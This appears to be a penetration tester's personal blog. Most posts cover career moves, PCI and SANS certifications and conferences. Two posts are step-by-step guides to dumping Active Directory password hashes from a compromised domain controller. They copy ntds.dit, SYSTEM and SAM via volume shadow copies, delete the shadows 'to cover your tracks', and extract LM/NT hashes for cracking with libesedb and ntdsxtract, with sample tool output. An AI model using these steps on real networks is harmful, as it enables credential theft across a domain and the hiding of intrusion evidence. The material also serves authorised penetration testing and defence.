Category: Security

Posted on

PCI PA/P2PE certifications

Took the Payment Application (PA) Qualified Security Assessor (QSA) exam back in March, just a couple of weeks after taking the Point to Point Encryption (P2PE) QSA exam. Surprisingly they both seemed fairly easy tests, the P2PE was a little harder since I had to study up on some crypto information.

Had been trying for a few months to assist with some P2PE assessment work, but it seems that is not as easy as I had hoped. Had asked to shadow some people or assist on small projects, but got nothing. I then asked to work on PA assessment, was invited out to the Colorado office to learn the internal processes, and go over some documents. Was asked if I was interested in joining the PA team by hte managing principal.

Finally decided to stop trying to get into the P2PE team, and took an opportunity on the PA team. Applied for a Senior Consultant position, but was only transferred over as a IT security Consultant. Not exactly sure what the deal is with promoting me to Senior, especially since I have more experience then most Senior Consultants that I have worked with so far. But that battle is for another day.

Will see how things go with doing the PA assessments, they do not seem to be very difficult, most of the testing is easy. The pentesting portion is kind of a joke, as they do only minor tests against SQLi, XSS, CSRF and buffer overflows. Almost makes me miss doing the pentesting stuff, and the exploiting software vulnerabilities.

Posted on

Starting off 2017 right! (I hope…..)

Well its 2017 already, and I am not sure where 2016 went.

Last year I was extremely busy, traveling about every week and multiple ROC’s due weekly for my previous company. Never had enough time to actually do my job well or even think about fixing the issues that we had. Now that I am at Coalfire, I have plenty of time to do my job, with tons of resources to help me out. I am not traveling as much, which I sort of miss, hope that changes a little starting soon. Working from home is a little weird, not sure it is something I really like, miss the interactions with other people. Not that I do not like my family, its just getting out of the house for a little while and talking to other people with similar interests. Will be trying to get former colleagues to do lunch once in a while to at least try to keep up with whats going on.

This year is starting off fairly decent for me, since I am getting to attend two different training classes. First one is an ISO 27001 Lead Auditor certification course. I will be heading to Colorado for a few days. The class was supposed to be for junior associates that needed a certification to allow them to get their QSA. I asked if their was space I would like to attend, and I guess there was room for me. The second class is PCI P2PE certification, which will be a little harder from my perspective. Most of my cryptography experience is military related and not really geared towards the commercial sector. If I pass this course, I have been asked if I wanted to take the PA-DSS course and then possibly the PA-P2PE course. Since they are in need of people to assist in that area, I said why not. I am always willing to take training classes, certifications never hurt anyone.

So it looks like my first full ROC I am lead on will be a client that they have had for a while. This should be fairly nice to get to learn their methodology, and show my manager, I am able to do the work. I was brought in as a consultant, and not a senior consultant. That was something I had decided to do, I originally had interviewed for a senior security consultant position, but since they were willing to pay me the same for either position, I took the lower level position. I am sure some are going WTF, I would never do that. Well, I am more than capable to be a senior consultant, but If I come in as a junior level person and can show that I am very good at my job, I will more than likely get a promotion or possibly opportunities to do other stuff. Which is sort of what is happening already with the certification courses.

Well 2017, lets hope things keep rolling along smoothly…..   

Posted on

Splitting my time between 2 bosses

So my move over to the PCI-QSA world has been extremely slow, primarily due to upper management. I have been currently splitting my time between doing penetration testing and QSA work. It has not been an easy process working for two bosses who have different scheduling styles. One gives me my schedule months out, and the other will send me an email days before he expects me to start working on a project. This does not always work well since the one boss does not usually look at my calendar to see if I will be available. So I get scheduled to do a penetration test when I will be onsite at a customers doing PCI work. Usually never works out in my favor, and makes for working long hours, with no compensation for it.
My bosses boss (our COO) said that on Jan 1 2016 I will move over to the PCI group but will still need to assist the penetration testing group with some projects. Not sure that is actually going to happen. The one thing that makes this a pain is they already hired a person to fill me on the team, but another person left in November leaving another shortage. The interesting thing is this same issue I am having with moving groups is the same reason I left the company the first time I worked there.
Only time will tell if I actually get to do my new job or if I am stuck being split between bosses.
Posted on

Getting Hashes From NTDS.dit File – Updated Version

Moved from my old WordPress Blog:

Decided to update my original post on getting hashes from NTDS.dit file.

Once you have access to a domain controller, the first step is to copy the needed files from the Volume Shadow Copy or create a copy if needed. I generally prefer to create a new copy, so I know it has the latest information.
Get ntds.dit and SYSTEM from Volume Shadow Copy on Host
Luckily Windows has built in tools to assist with collecting the files needed.
Vssadmin tool
List Volume Shadow Copies on the system:
C:vssadmin list shadows
Example: ‘vssadmin list shadows’ no Shadows Available
C:>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.
Create a new Volume Shadow Copy of the current drive:
C:vssadmin create shadow /for=C:
Example: ‘vssadmin create shadow’ copy:
C:>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for 'c:'
 Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
 Shadow Copy Volume Name: \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1

Pull files from the Volume Shadow copy: (EXAMPLES)
The volume shadow copy looks similar to the lines below:

\?GLOBALROOTDevice<SHADOWYCOPY DISK>windows<directory><File> <where to put file>

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowsntdsntds.dit .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSYSTEM .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSAM .
[X] Refers to the shadow copy number, in the examples above the latest versions is HarddiskVolumeShadowCopy1
(there could be multiple copies, use the last one listed)

Registry Save

I also recommend getting a current copy of SYSTEM from the registry just in case.
Having had a couple times where the SYSTEM file from the shadow copy was corrupt.
reg SAVE HKLMSYSTEM c:SYS
Delete the shadows to cover your tracks:
vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
EXAMPLE:
 vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3
Now that you have the files, it is time to get the hashes
Utilities needed:
 • libesedb
 • ntdsxtract
libesedb
Download libesedb: (Use which ever method you are comfortable with below)
Release Code:
https://github.com/libyal/libesedb/releases
(Download and unzip)
Compile Code:
https://github.com/libyal/libesedb
https://github.com/libyal/libesedb/wiki/Building
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./configure
make
esedbexport usage:
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file
Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
 [ -T table_name ] [ -hvV ] source 

source: the source file

-c: codepage of ASCII strings, options: ascii, windows-874,
 windows-932, windows-936, windows-1250, windows-1251,
 windows-1252 (default), windows-1253, windows-1254
 windows-1255, windows-1256, windows-1257 or windows-1258
 -h: shows this help
 -l: logs information about the exported items
 -m: export mode, option: all, tables (default)
 'all' exports all the tables or a single specified table with indexes,
 'tables' exports all the tables or a single specified table
 -t: specify the basename of the target directory to export to
 (default is the source filename) esedbexport will add the suffix
 .export to the basename
 -T: exports only a specific table
 -v: verbose output to stderr
 -V: print version
 Runing esedbexport to extract ntds.dit data:
 ./esedbexport -t <Directory to export data to> <ntds.dit file>

.export will be added to the end of the directory listed above

EXAMPLE:
 # ./esedbexport -t ~/ntds ~/ntds.dit
 esedbexport 20150409

Opening file.
 Exporting table 1 (MSysObjects) out of 11.
 Exporting table 2 (MSysObjectsShadow) out of 11.
 Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
 Exporting table 4 (datatable) out of 11.
 Exporting table 5 (link_table) out of 11.
 Exporting table 6 (hiddentable) out of 11.
 Exporting table 7 (sdproptable) out of 11.
 Exporting table 8 (sd_table) out of 11.
 Exporting table 9 (quota_table) out of 11.
 Exporting table 10 (quota_rebuild_progress_table) out of 11.
 Exporting table 11 (MSysDefrag1) out of 11.
 Export completed.
(Depending on the number of user accounts this can take some time to generate)
Extracted files:

# ls ~/ntdis.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

NTDSXtract:
http://www.ntdsxtract.com/

CURRENT BUILD:
https://github.com/csababarta/ntdsxtract
git clone https://github.com/csababarta/ntdsxtract.git
Usage for dsuser.py
DSUsers v1.3.3
Extracts information related to user objects

usage: ./dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its cache files and output files. If the directory does not exist it will be created.
options:
–sid <user sid>
List user identified by SID
–guid <user guid>
List user identified by GUID
–name <user name regexp>
List user identified by the regular expression
–active
List only active accounts
–locked
List only locked accounts
–syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
–lmoutfile <name of the LM hash output file>
–ntoutfile <name of the NT hash output file>
–pwdformat <format of the hash output>
ophc – OphCrack format
When this format is specified the NT output file will be used
john – John The Ripper format
ocl – oclHashcat format
When this format is specified the NT output file will be used
–passwordhashes
Extract password hashes
–passwordhistory
Extract password history
–certificates
Extract certificates
–supplcreds
Extract supplemental credentials (e.g.: clear text passwords,
kerberos keys)
–membership
List groups of which the user is a member
–csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the
output
–debug <name of the CSV output file>
Turn on detailed error messages and stack trace
Extracting user info:
python dsusers.py <datatable> <linktable> <work directory> [option]
(datatable and linktable are from the previously extracted files)
–lmoutfile (output file for LM hashes)
–ntoutfile (output file for NTLM hashes
–pwdformat john (output in JTR format)
–syshive (SYSTEM file from system where the NTDS.dit was retrieved)
# python dsusers.py <DATATABLE FILE> <LINKTABLE FILE> <DIRECTORY TO WORK IN> –passwordhashes –lmoutfile <LM OUT FILE> –ntoutfile <NTLM OUT FILE> –pwdformat john –syshive <SYSTEM FILE>
(Add –passwordhistory to get previous hashes for each user, will vary on number hashes based on Domain settings for password history)
Example Output in JTR Format:
 # python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP 
--passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

 [+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
 [+] Started with options:
 [-] Extracting password hashes
 [-] LM hash output filename: LM.out
 [-] NT hash output filename: NT.out
 [-] Hash output format: john The directory (/root/TEMP) specified does not exists!
 Would you like to create it? [Y/N] y
 [+] Initialising engine...
 [+] Loading saved map files (Stage 1)...
 [!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/offlid.map' [+] Rebuilding maps...
 [+] Scanning database - 100% -> 40933 records processed
 [+] Sanity checks...
 Schema record id: 1481
 Schema type id: 10
 [+] Extracting schema information - 100% -> 4142 records processed
 [+] Loading saved map files (Stage 2)...
 [!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/links.map'
 [+] Rebuilding maps...
 [+] Extracting object links...
 List of users:
 ==============
 (This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
 User name: FName LName
 User principal name: email@address.net
 SAM Account name: name
 SAM Account type: SAM_NORMAL_USER_ACCOUNT
 GUID: 14a15a2a-887a-4444-a54a-aa6a4a689a00
 SID: S-1-5-21-350701555-3721294507-2303513147-3801
 When created: 2005-06-01 13:50:37
 When changed: 2013-12-12 15:08:12
 Account expires: Never
 Password last set: 2013-10-07 13:20:19.146593
 Last logon: 2013-12-11 18:35:10.166785
 Last logon timestamp: 2013-12-12 15:08:12.281517
 Bad password time 2013-12-11 00:04:52.446209
 Logon count: 6239
 Bad password count: 0
 User Account Control:
 NORMAL_ACCOUNT
 Ancestors:
 $ROOT_OBJECT$ local DOMAIN JOB Users FName LName
 Password hashes:
 name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
 name:e4c3436ddd1f625c6fede0fa5525f000:::
(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)
Now that you have what you need…. it is time to start cracking passwords to get to that data you wanted…
Posted on

Passed the GWAPT cert

I took the SANS GIAC Web Application Penetration Tester (GWAPT) class back in December of 2014 in Washington DC with Eric Conrad. Have been procrastinating for several months before I had to finally break down and take the certification before my time expired in late April 2015.
Spent a few days going over the books to refresh me on the content that we went over, and took one of the practice exams and actually did not do too well on it. Never taking a SANS cert before I was not sure what to expect, and probably should have actually allowed for the 2 hours to sit the practice test. Rushed though it and guessed a lot of the questions, and did not remember going of half of the info. (Note to self actually read the questions and each answer and not just say that looks good.) Overall I was a little frustrated after the first  practice exam, since I have been doing this for about 3 years now, and many of the questions seemed to be based on opinion, and not actual facts. Several of the questions had more to do with general penetration testing then actually web application testing, like needing to know the TTL from a DNS request for a domain name.
So read the books a few more days before taking the second practice test, which I did much better on, since I had some idea on what to expect on the test.Did rush though it again actually did the entire test in 48 minutes. Which is really not that great, but I just wanted to make sure I had some idea what they real test would be like. Two days later I sat for the actual GWAPT test, and planned to take my time and read every question throughly.
Sat for the exam on April 9, 2015. Finished the test and passed it fairly easily, but was some what perplexed that it had nothing similar to the practice tests. It seemed the the practice exams had nothing to do with the the actual exam. Many of the questions were topics that were in the books, but never brought up in the practice tests. Which frustrated me a little, since I had to spend a little more time looking for some of the answers, that I had not really gone over previously.
So anyone planning on sitting the exam, and that has not taken a SANS cert before, plan accordingly to make sure you know all of the content in the books. Do not expect that the practice exams will actually prepare you for the real test, it might actually make you study information that is never asked on the exam.
Posted on

SANS SEC 542 – Washington DC CDI

Attended SANS SEC 542 Web App Penetration Testing and Ethical Hacking class in Washington DC at the Grand Hyatt from December 12 – 17 2014.
The instructor was Eric Conrad, and the class was fairly decent, and is a good start for anyone wanting to learn web application pentesting. I already had some extensive knowledge of web app testing, but decide to take the course anyways to see what SANS course were like.
Learned a few things, but primarily new most of the course material, most of the new things I learned are tool related. I do not usually use ZAP or W3AF, and since we used them in class I learned a few things about them and their capabilities.
There was a wide variety of people in the class, with about 30 students in the class room and about 15 online students. We had some that had no pentesting abilities, and some with a couple years experience.
The class was a six day course:
      DAY 1 : Attacker’s View, Pentesting and Scoping
      DAY 2 : Recon & Mapping
      DAY 3 : Discovery
      DAY 4 : Discovery Continued
      DAY 5 : Exploitation
          DAY 6 : Capture the Flag
My team completed the CTF first, but Eric Conrad could not decide who yelled out first so he called it a tie with the team sitting just behind us.
The biggest things I learned from the class was actually not taught in the class room, it was talking to the people there who are doing pentesting and works in the security community. Plus the additional talks that were held after classes were well worth staying up late and not going sight seeing around DC.
Now I just need to figure out how to get my boss to allow me to attend another one next year.
Posted on

Derbycon 4.0

Well Derbycon 4.0 is over, and now things have to go back to normal.
My boss has already scheduled me 3 new projects, and I have not finished last weeks projects because I was too excited to get to Derbycon.
Completed the Urban Bourbon Trail (all in half a day, which I do not recommend unless you have the full day). Started at 2pm on Thursday after arriving at the Hyatt in Louisville KY. and was done by 8pm that night. Felt terrible most of Friday morning but did not stop me from getting in on the CTF.
Had a blast at Derbycon, spent most of my time playing CTF and hanging out with friends.
Team nanerpwn came in 2nd place in the CTF, and we had a good lead for most of the time on Friday and Saturday. Could not hold on to the lead towards the end, had a few people drop off to head back home early. So maybe next year we will come in 1st, if we can get everyone to stay until Sunday afternoon.
Ready for Derbycon 5.0
Posted on

Bahrain – Working for another manager is trying my patience

Well I am almost done with my small tour in Bahrain, and will be glad to be home. I will miss some of the people, they are great and were a joy to work with.
As for the project that my company is contracted on, I am a little pissed that nothing has really been done, since I last left from working over here. Well none of the projects that we were supposed to be working on. Many of the other vendors that had projects have finished, or are scheduled to finish their projects. It seems that the manager in charge has either not worried about the project or is clueless that his employees are lying to him.
The two people that were hired to come over here and work for the last year, which are not security minded people by the way, did almost nothing during the time they were over here. From what I can tell, it looks like they relied on other vendors to do most of the work and they took all of the credit for it. Most of the projects are not even actually started, but are marked as partially complete. I have been working on a Bit9 installation for a couple of weeks, there are 1200+ workstations in the environment, and only 130 systems have the software installed. There are no real policies defined, and  only two workstations are locked down. The manager believes that all systems have the software installed and they are completely protected, I tried to let him know, and he did not see to want to hear it. I dropped the conversations and began working on a solution to the issue.
I am ready to get back to pentesting, where I can actually do some good, well I will keep telling my self that. Many of my customers, just want a band-aid to cover over the problems, and not really work on fixing things, but I still get to have fun in the process.
Posted on

Pentesting Companies – Praetorian

I have been researching a few pentesting companies over the past few months, just to compare my current employer to others. I am happy at my current employer, I enjoy what I do, and most of the people I work with. I am just curious what other companies do for their employees, and what they require from them.
Through my research I noticed that many of them give fairly good benefits, and seem to have a relaxed work environment.
I was surprised that several require their employees to speak at conferences, write white-papers, and do research. While I am not against any of this, I am wondering how they would have time to accomplish any of this. I am booked solid usually weeks on end, with maybe a  day or less of down time a month. Many also require 25% or more travel, which I am not opposed to either, but I generally do most of my assessments remotely. I have complained to my boss that we do not travel to customers enough. I prefer to do some face-to-face conversations with my customers to get a better understanding of their needs. Plus it makes it easier to social engineer information from someone.
I was fairly impressed with Praetorian who is head quarters are in Austin, TX. They seem to have some very skilled and knowledgable consultants, who are involved in the security community and open-source projects. They seem to be involved with the local college (University of Texas), having career expos at UT. They also have some small puzzles that you can try to work. I will have to try these when I get some spare time.
A Job Posting for a “Senior Security Consultant (Software)”
Qualifications: Successful candidates should have:
  1. 2-5 years of information security experience
  2. 1-2 years of consulting experience
  3. Strong understanding of software and application security
  4. Experience with languages such as C, C++, Java, .NET, Ruby, and Python
  5. Strong oral and written communication skills
  6. Involvement in software community via OWASP, WASC, and/or open source development highly desirable
  7. Track record speaking at major security conferences such as OWASP Appsec, SANS Appsec, and Blackhat highly desirable
  8. Ability to travel 10% of the time
  9. Minimum 4-Year Bachelor of Science Degree in Computer Science, Engineering, or equivalent from a “top ten” institution.
While the travel is a lot less than many of the other companies, they require a person who is good a public speaking at large conferences and is involved in the security community.
Well I guess if  I wanted to go and work for them, I need to start speaking at conferences and get more involved in the security community. Not really going back to college to get a degree from a “Top Ten” institution unless some one else is willing to pay for it.
Posted on

Getting Hashes from NTDS.dit file

Read a writeup from @Mubix about doing this and noticed that some changes had come to the NTDSxtract software which made things a little easier, so I decided to do a write up on on the two versions
Why do you want to do this anyways?
The reason you would want to pull the ntds.dit file from a Domain Controller after you have compromised it is because you do not want to create a new Domain Administrator account (could set off alerts) and need password hashes; or you need a password for another account to access data you want (ie. SQL Server accounts).

Get the ntds.dit and SYSTEM from Volume Shadow Copy on a Domain Controller

1. Vssadmin tool

1.1 List Volume Shadow Copies on the system:

Example: ‘vssadmin list shadows’ no Shadows Available
C:>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line too
(C) Copyright 2001 Microsoft Corp.
No items found that satisfy the query.

1.2. Create a new Volume Shadow Copy of the current drive:

Example: ‘vssadmin create shadow’ copy:
C:>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.
Successfully created shadow copy for ‘c:’
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1

2. Pull files from the Volume Shadow copy

copy \?GLOBALROOTDevice<SHADOWYCOPY DISK>windows<directory><File> <where to put file>
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowsntdsntds.dit .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSYSTEM .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSAM .
 [X] Refers to the shadow copy number, in the examples above the latest versions is HarddiskVolumeShadowCopy1 (there could be multiple copies, use the last one listed)
I would also recommend getting a current copy of SYSTEM from the registry just in case.
reg SAVE HKLM/SYSTEM c:SYS
I have had a couple times where the SYSTEM file from the shadow copy was corrupt.

3. Delete the shadows to cover your tracks:

vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
vssadmin delete shadows /for=C: /shadow= e8eb7931-5056-4f7d-a5d7-05c30da3e1b3

4. Optional VSSOwn Script to help with this task:

http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs

5. Now that you have the files, it is time to get the hashes

5.1 Utilities needed:

  • libesedb
  • ntdsxtract

5.2 libesedb

https://code.google.com/p/libesedb/
http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz

Extract the files

# tar -xzvf libesedb-alpha-20120102.tar.gz

Compile/make libesedb

# cd libesedb-20120102
# ./configure
# make
Need to move this somewhere like ‘/usr/local/’
# mv esedbtools/ /usr/local
# cd esedbtools/

esedbexport usage:

Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source
source: the source file
-c:     codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h:     shows this help
-l:     logs information about the exported items
-m:     export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t:     specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T:     exports only a specific table
-v:     verbose output to stderr
-V:     print version

Run esedbexport to extract ntds.dit data :

./esedbexport  -t  <Directory to export data to(will add .export to the end)> <ntds.dit file>
# ./esedbexport  -t ~/ntds ~/ntds.dit
esedbexport 20120102
Opening file.

Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.

Extracted files:

# ls ~/ntdis.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

5.3 NTDSXtract:

http://www.ntdsxtract.com/
http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_2_beta.zip
# unzip ntdsxtract_v1_0.zip
# cd NTDSXtract 1.0/
To update to the new 1.2 Beta version unzip the contents in side the “NTDSXtract 1.0”
(You might want to rename the directory to just NTDSXtract)
# unzip ntdsxtract_v1_2_beta.zip

Usage for dsuser.py (Version 1.0 and 1.2 Beta)

Ver 1.0
 # python dsusers.py
 DSUsers
 Extracts information related to user objects
 usage: dsusers.py <datatable> <linktable> [option]
 options:
 --rid <user rid>
 List user identified by RID
 --name <user name>
 List user identified by Name
 --passwordhashes <system hive>
 Extract password hashes
 --passwordhistory <system hive>
 Extract password history
 --certificates
 Extract certificates
 --supplcreds <system hive>
 Extract kerberos keys
 --membership
 List groups of which the user is a member
Ver 1.2
 # python ../NTDSXtract 1.0/dsusers.py 
 DSUsers v1.2
 Extracts information related to user objects
 usage: ../NTDSXtract 1.0/dsusers.py <datatable> <linktable> <work directory> [option]
 datatable
 The path to the file called datatable extracted by esedbexport
   linktable
 The path to the file called linktable extracted by esedbexport
 work directory
 The path to the directory where ntdsxtract should store its
 cache files and output files. If the directory does not exist
 it will be created.

 options:
 --rid <user rid>
 List user identified by RID
 --name <user name>
 List user identified by Name
     --syshive <path to system hive>
 Required for password hash and history extraction
 This option should be specified before the password hash
 and password history extraction options!
 --lmoutfile    <name of the LM hash output file>
 --ntoutfile      <name of the NT hash output file>
 --pwdformat  <format of the hash output>
 ophc - OphCrack format
 When this format is specified the NT output file will be used
 john - John The Ripper format
 --passwordhashes
 Extract password hashes
     --passwordhistory
 Extract password history
 --certificates
 Extract certificates
 --supplcreds
 Extract kerberos keys
 --membership
 List groups of which the user is a member
 --csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the output

Extract user info:

Ver 1.0
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 --passwordhashes ~/sys --passwordhistory ../sys
Running with options:
Extracting password hashes
Extracting password history
Initialising engine...
Scanning database - 100% -> 40933 records processed
Extracting schema information - 100% -> 4142 records processed
Extracting object links...

List of users:
==============
Record ID:           1815
User name:           Administrator
User principal name: Administrator@DOMAIN
SAM Account name:    Administrator
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 3543ea4c-f755-4758-97c0-3d63dffc96ad
SID:  S-1-5-21-657512695-1375287660-316888650-500
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 16:10:29
Account expires:      Never
Password last set:    2006-08-22 11:53:34.828125
Last logon:           2013-10-03 19:11:25.366397
Last logon timestamp: 2013-09-30 10:43:09.479359
Bad password time     2013-10-03 17:36:20.168265
Logon count:          65535
Bad password count:   0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ priv DOMAIN main Domain Admins Administrator
Password hashes:
    Administrator:$NT$0817033191709a45c93baa986d933d0e:::
Password history:
    Administrator_nthistory0:$NT$0817033191709a45c93baa986d933d0e:::
    Administrator_nthistory1:$NT$70aa17fabbaf3b0511f430844c6de431:::
    Administrator_lmhistory0:f8eab0fa471aff3edab057c59e5d0aa5:::
Record ID:           1816
User name:           Guest
User principal name:
SAM Account name:    Guest
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 2e792141-c4be-43b2-a4f5-079e5d05e184
SID:  S-1-5-21-657512695-1375287660-316888650-501
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 15:19:28
Account expires:      Never
Password last set:    Never
Last logon:           Never
Last logon timestamp: Never
Bad password time     2013-10-03 18:18:45.096975
Logon count:          0
Bad password count:   1
User Account Control:
Disabled
PWD Not Required
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ priv DOMAIN main Users Guest
Password hashes:
Password history:
….(Continues for each Account)….
Ver 1.2 (Output in JTR Format)
python dsusers.py ~/ntds.export/datatable.3  ~/ntds.export/link_table.4 ~/TEMP  --passwordhashes --passwordhistory --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

List of users:
==============
Record ID:           32777
User name:           joe smith
User principal name: email@address.net
SAM Account name:    jsmith
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 14c15e2a-8f7c-4404-a63c-cb6a4c689c00
SID:  S-1-5-21-349701255-3731294407-2303513147-3800
When created:         2005-06-01 13:50:37
When changed:         2013-12-12 15:08:12
Account expires:      Never
Password last set:    2013-10-07 13:20:19.146593
Last logon:           2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time     2013-12-11 00:04:52.446209
Logon count:          6239
Bad password count:   0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users joe smith
Password hashes:
name:$NT$2e8fc4b95229a6ea67b1f69d04ee4000:::
name:e4c2436ddd1f655c6eedd0fa5525f000:::
….(Continues for each Account)….
Version 1.2 allows you to extract the hashes into two files, one for LM hashes the other for NT hashes, and currently supports two hash output types; Ophcrack and John.